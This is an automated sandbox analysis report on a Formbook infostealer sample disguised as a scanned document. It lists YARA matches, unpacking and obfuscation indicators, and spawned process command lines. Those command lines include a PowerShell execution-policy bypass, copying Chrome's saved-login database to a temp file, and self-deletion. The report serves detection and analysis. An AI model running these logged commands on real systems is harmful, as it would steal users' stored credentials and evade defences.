 Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.799680679.0000000000202000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenqYa59zXUnmgY7b.exeD vs SKMBT 25032020 Ref- 0000019.exe Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.826046931.0000000005B70000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs SKMBT 25032020 Ref- 0000019.exe Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.827347996.0000000005C60000.00000002.00000001.sdmp Binary or memory string: originalfilename vs SKMBT 25032020 Ref- 0000019.exe Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.827347996.0000000005C60000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SKMBT 25032020 Ref- 0000019.exe Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.799769107.0000000000397000.00000004.00000010.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SKMBT 25032020 Ref- 0000019.exe Source: SKMBT 25032020 Ref- 0000019.exe, 00000004.00000002.826583597.0000000000B32000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenqYa59zXUnmgY7b.exeD vs SKMBT 25032020 Ref- 0000019.exe Source: SKMBT 25032020 Ref- 0000019.exe, 00000004.00000002.825199884.0000000000436000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameReZer0V4.exe. vs SKMBT 25032020 Ref- 0000019.exe Source: SKMBT 25032020 Ref- 0000019.exe, 00000004.00000002.829222069.0000000001590000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs SKMBT 25032020 Ref- 0000019.exe Source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000000.824272503.0000000000FD2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenqYa59zXUnmgY7b.exeD vs SKMBT 25032020 Ref- 0000019.exe Source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.928565433.0000000001B1F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SKMBT 25032020 Ref- 0000019.exe Source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.927343543.00000000019C0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs SKMBT 25032020 Ref- 0000019.exe Source: SKMBT 25032020 Ref- 0000019.exe Binary or memory string: OriginalFilenamenqYa59zXUnmgY7b.exeD vs SKMBT 25032020 Ref- 0000019.exe
 Searches the installation path of Mozilla Firefox Show sources
 Source: C:\Windows\SysWOW64\wscript.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory Jump to behavior
 Yara signature match Show sources
 Source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
 PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3) Show sources
 Source: SKMBT 25032020 Ref- 0000019.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ Source: Cookies7n1p8js.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 .NET source code contains many API calls related to security Show sources
 Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0008u2000.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent() Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0008u2000.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole) Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0008u2000.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent() Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0008u2000.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole) Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0006u2000.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent() Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0006u2000.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity) Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0006u2000.cs Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule) Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0006u2000.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent() Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0006u2000.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity) Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0006u2000.cs Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@25/21@41/7
 Creates files inside the user directory Show sources
 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe File created: C:\Users\Public\cAFdqNkr.ps1 Jump to behavior
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_01 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_01 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_01 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_01 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Mutant created: \Sessions\1\BaseNamedObjects\ASvyjsAiwyLTzwKn
 Creates temporary files Show sources
 Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jkjtrz3.fhh.ps1 Jump to behavior
 Launches a second explorer.exe instance Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe
 PE file has an executable .text section and no other executable section Show sources
 Source: SKMBT 25032020 Ref- 0000019.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this applications are using the .NET runtime (Probably coded in C#) Show sources
 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
 Reads ini files Show sources
 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
 Reads software policies Show sources
 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
 Reads the hosts file Show sources
 Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
 Sample is known by Antivirus Show sources
 Source: SKMBT 25032020 Ref- 0000019.exe Virustotal: Detection: 24%
 Spawns processes Show sources
 Source: unknown Process created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe 'C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe' Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\cAFdqNkr.ps1' Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: unknown Process created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe {path} Source: unknown Process created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe {path} Source: unknown Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe' Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: unknown Process created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\cAFdqNkr.ps1' Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: unknown Process created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe {path} Source: unknown Process created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe {path} Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\cAFdqNkr.ps1' Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe {path} Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe {path} Jump to behavior Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Jump to behavior Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe' Jump to behavior Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\cAFdqNkr.ps1' Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe {path} Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe {path}
 Uses an in-process (OLE) Automation server Show sources
 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32 Jump to behavior
 Writes ini files Show sources
 Source: C:\Windows\SysWOW64\wscript.exe File written: C:\Users\user\AppData\Roaming\K-NOB87E\K-Nlogri.ini Jump to behavior
 Found graphical window changes (likely an installer) Show sources
 Source: Window Recorder Window detected: More than 3 window changes detected
 Uses Microsoft Silverlight Show sources
 Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
 Checks if Microsoft Office is installed Show sources
 Source: C:\Windows\SysWOW64\wscript.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
 PE file contains a COM descriptor data directory Show sources
 Source: SKMBT 25032020 Ref- 0000019.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
 Contains modern PE file flags such as dynamic base (ASLR) or NX Show sources
 Source: SKMBT 25032020 Ref- 0000019.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
 Binary contains paths to debug symbols Show sources
 Source: Binary string: explorer.pdbUGP source: Cookies7n1p8js.exe, 00000015.00000002.1352349999.0000000002750000.00000040.00000001.sdmp Source: Binary string: wscript.pdbGCTL source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.927343543.00000000019C0000.00000040.00000001.sdmp Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.880956689.0000000007010000.00000002.00000001.sdmp Source: Binary string: wntdll.pdbUGP source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.928565433.0000000001B1F000.00000040.00000001.sdmp, Cookies7n1p8js.exe, 00000015.00000002.1349336799.0000000000B50000.00000040.00000001.sdmp Source: Binary string: wntdll.pdb source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.928565433.0000000001B1F000.00000040.00000001.sdmp, Cookies7n1p8js.exe Source: Binary string: wscript.pdb source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.927343543.00000000019C0000.00000040.00000001.sdmp Source: Binary string: explorer.pdb source: Cookies7n1p8js.exe, 00000015.00000002.1352349999.0000000002750000.00000040.00000001.sdmp Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.880956689.0000000007010000.00000002.00000001.sdmp

#### Data Obfuscation:

 Detected unpacking (changes PE section rights) Show sources
 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Unpacked PE file: 21.2.Cookies7n1p8js.exe.400000.0.unpack .text:ER;.reloc:R;.rsrc:R; vs .text:ER;
 .NET source code contains potential unpacker Show sources
 Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0006u2000.cs .Net Code: \x06 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0006u2000.cs .Net Code: \x06 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C2718 push edi; ret 0_2_001C27E8 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C220C push edi; ret 0_2_001C22DC Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C3E02 push edi; ret 0_2_001C3F8C Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C2A20 push edi; ret 0_2_001C2AF0 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C2C74 push edi; ret 0_2_001C2D44 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C6162 push edi; ret 0_2_001C61D0 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C3C94 push edi; ret 0_2_001C3D64 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C2B8E push edi; ret 0_2_001C2D44 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C34AC push edi; ret 0_2_001C357C Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C62D8 push edi; ret 0_2_001C63A8 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C50F8 push edi; ret 0_2_001C51C8 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C5FF4 push edi; ret 0_2_001C60C4 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C39E8 push edi; ret 0_2_001C3AB8 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 0_2_001C2DE2 push edi; ret 0_2_001C2FFC Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF34AC push edi; ret 4_2_00AF357C Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF2B8E push edi; ret 4_2_00AF2D44 Source: 